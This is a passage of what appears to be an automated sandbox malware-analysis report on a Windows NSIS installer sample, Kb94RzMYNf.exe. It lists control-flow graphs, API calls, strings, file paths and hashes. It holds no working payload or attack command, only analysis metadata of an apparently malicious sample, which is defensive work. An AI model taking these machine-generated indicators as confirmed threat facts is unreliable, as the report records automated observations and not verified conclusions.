                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                              • API String ID: 1975747703-1693343726
                                                                                                                                                              • Opcode ID: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                                                                                              • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                                                                                                                              • Opcode Fuzzy Hash: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                                                                                              • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 361 402dee-402e3c GetTickCount GetModuleFileNameW call 405c25 364 402e48-402e76 call 406050 call 405a50 call 406050 GetFileSize 361->364 365 402e3e-402e43 361->365 373 402f63-402f71 call 402d8a 364->373 374 402e7c 364->374 366 403020-403024 365->366 380 402f73-402f76 373->380 381 402fc6-402fcb 373->381 376 402e81-402e98 374->376 378 402e9a 376->378 379 402e9c-402ea5 call 403242 376->379 378->379 386 402eab-402eb2 379->386 387 402fcd-402fd5 call 402d8a 379->387 384 402f78-402f90 call 403258 call 403242 380->384 385 402f9a-402fc4 GlobalAlloc call 403258 call 403027 380->385 381->366 384->381 408 402f92-402f98 384->408 385->381 412 402fd7-402fe8 385->412 390 402eb4-402ec8 call 405be0 386->390 391 402f2e-402f32 386->391 387->381 399 402f3c-402f42 390->399 410 402eca-402ed1 390->410 398 402f34-402f3b call 402d8a 391->398 391->399 398->399 403 402f51-402f5b 399->403 404 402f44-402f4e call 4064db 399->404 403->376 411 402f61 403->411 404->403 408->381 408->385 410->399 414 402ed3-402eda 410->414 411->373 415 402ff0-402ff5 412->415 416 402fea 412->416 414->399 417 402edc-402ee3 414->417 418 402ff6-402ffc 415->418 416->415 417->399 419 402ee5-402eec 417->419 418->418 420 402ffe-403019 SetFilePointer call 405be0 418->420 419->399 422 402eee-402f0e 419->422 423 40301e 420->423 422->381 424 402f14-402f18 422->424 423->366 425 402f20-402f28 424->425 426 402f1a-402f1e 424->426 425->399 427 402f2a-402f2c 425->427 426->411 426->425 427->399
                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Kb94RzMYNf.exe,00000400,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00402E1B
                                                                                                                                                                • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C29
                                                                                                                                                                • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C4B
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Kb94RzMYNf.exe,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00402E67
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Kb94RzMYNf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                              • API String ID: 4283519449-1522069007
                                                                                                                                                              • Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                                              • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                                                                                                                              • Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                                              • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 554 401767-40178c call 402bbf call 405a7b 559 401796-4017a8 call 406050 call 405a04 lstrcatW 554->559 560 40178e-401794 call 406050 554->560 566 4017ad-4017ae call 4062e4 559->566 560->566 569 4017b3-4017b7 566->569 570 4017b9-4017c3 call 406393 569->570 571 4017ea-4017ed 569->571 579 4017d5-4017e7 570->579 580 4017c5-4017d3 CompareFileTime 570->580 573 4017f5-401811 call 405c25 571->573 574 4017ef-4017f0 call 405c00 571->574 581 401813-401816 573->581 582 401885-4018ae call 4051af call 403027 573->582 574->573 579->571 580->579 583 401867-401871 call 4051af 581->583 584 401818-401856 call 406050 * 2 call 406072 call 406050 call 405795 581->584 596 4018b0-4018b4 582->596 597 4018b6-4018c2 SetFileTime 582->597 594 40187a-401880 583->594 584->569 617 40185c-40185d 584->617 598 402a55 594->598 596->597 600 4018c8-4018d3 CloseHandle 596->600 597->600 602 402a57-402a5b 598->602 603 4018d9-4018dc 600->603 604 402a4c-402a4f 600->604 606 4018f1-4018f4 call 406072 603->606 607 4018de-4018ef call 406072 lstrcatW 603->607 604->598 612 4018f9-40228d call 405795 606->612 607->612 612->602 612->604 617->594 619 40185f-401860 617->619 619->583
                                                                                                                                                              APIs
                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism,?,?,00000031), ref: 004017A8
                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism,?,?,00000031), ref: 004017CD
                                                                                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Janushoveds Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,774D23A0), ref: 0040520A
                                                                                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll$C:\Users\user\AppData\Local\neoimpressionism$ExecToStack
                                                                                                                                                              • API String ID: 1941528284-1591583891
                                                                                                                                                              • Opcode ID: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                                                                                              • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                                                                                                                              • Opcode Fuzzy Hash: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                                                                                              • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 620 4051af-4051c4 621 4051ca-4051db 620->621 622 40527b-40527f 620->622 623 4051e6-4051f2 lstrlenW 621->623 624 4051dd-4051e1 call 406072 621->624 626 4051f4-405204 lstrlenW 623->626 627 40520f-405213 623->627 624->623 626->622 628 405206-40520a lstrcatW 626->628 629 405222-405226 627->629 630 405215-40521c SetWindowTextW 627->630 628->627 631 405228-40526a SendMessageW * 3 629->631 632 40526c-40526e 629->632 630->629 631->632 632->622 633 405270-405273 632->633 633->622
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                              • lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                              • lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,774D23A0), ref: 0040520A
                                                                                                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                              • String ID: Completed
                                                                                                                                                              • API String ID: 2531174081-3087654605
                                                                                                                                                              • Opcode ID: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                                                                                              • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
                                                                                                                                                              • Opcode Fuzzy Hash: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                                                                                              • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 634 403027-40303e 635 403040 634->635 636 403047-403050 634->636 635->636 637 403052 636->637 638 403059-40305e 636->638 637->638 639 403060-403069 call 403258 638->639 640 40306e-40307b call 403242 638->640 639->640 644 403230 640->644 645 403081-403085 640->645 646 403232-403233 644->646 647 4031db-4031dd 645->647 648 40308b-4030d4 GetTickCount 645->648 649 40323b-40323f 646->649 652 40321d-403220 647->652 653 4031df-4031e2 647->653 650 403238 648->650 651 4030da-4030e2 648->651 650->649 654 4030e4 651->654 655 4030e7-4030f5 call 403242 651->655 656 403222 652->656 657 403225-40322e call 403242 652->657 653->650 658 4031e4 653->658 654->655 655->644 667 4030fb-403104 655->667 656->657 657->644 668 403235 657->668 659 4031e7-4031ed 658->659 662 4031f1-4031ff call 403242 659->662 663 4031ef 659->663 662->644 671 403201-40320d call 405cd7 662->671 663->662 670 40310a-40312a call 406549 667->670 668->650 676 403130-403143 GetTickCount 670->676 677 4031d3-4031d5 670->677 678 4031d7-4031d9 671->678 679 40320f-403219 671->679 680 403145-40314d 676->680 681 40318e-403190 676->681 677->646 678->646 679->659 684 40321b 679->684 685 403155-403186 MulDiv wsprintfW call 4051af 680->685 686 40314f-403153 680->686 682 403192-403196 681->682 683 4031c7-4031cb 681->683 687 403198-40319f call 405cd7 682->687 688 4031ad-4031b8 682->688 683->651 689 4031d1 683->689 684->650 693 40318b 685->693 686->681 686->685 694 4031a4-4031a6 687->694 692 4031bb-4031bf 688->692 689->650 692->670 695 4031c5 692->695 693->681 694->678 696 4031a8-4031ab 694->696 695->650 696->692
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                                                              • String ID: ... %d%%$@
                                                                                                                                                              • API String ID: 551687249-3859443358
                                                                                                                                                              • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                                                                                              • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                                                                                                                              • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                                                                                              • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 697 40567e-4056c9 CreateDirectoryW 698 4056cb-4056cd 697->698 699 4056cf-4056dc GetLastError 697->699 700 4056f6-4056f8 698->700 699->700 701 4056de-4056f2 SetFileSecurityW 699->701 701->698 702 4056f4 GetLastError 701->702 702->700
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004056D5
                                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004056F4
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\Desktop, xrefs: 0040567E
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                              • API String ID: 3449924974-3530169944
                                                                                                                                                              • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                                              • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                                                                                              • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                                              • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 703 4063ba-4063da GetSystemDirectoryW 704 4063dc 703->704 705 4063de-4063e0 703->705 704->705 706 4063f1-4063f3 705->706 707 4063e2-4063eb 705->707 709 4063f4-406427 wsprintfW LoadLibraryExW 706->709 707->706 708 4063ed-4063ef 707->708 708->709
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                                              • wsprintfW.USER32 ref: 0040640C
                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                                                              • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                                              • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                                                                                              • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                                              • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 710 405c54-405c60 711 405c61-405c95 GetTickCount GetTempFileNameW 710->711 712 405ca4-405ca6 711->712 713 405c97-405c99 711->713 715 405c9e-405ca1 712->715 713->711 714 405c9b 713->714 714->715
                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405C72
                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                                                                                                                              • "C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 00405C54
                                                                                                                                                              • nsa, xrefs: 00405C61
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
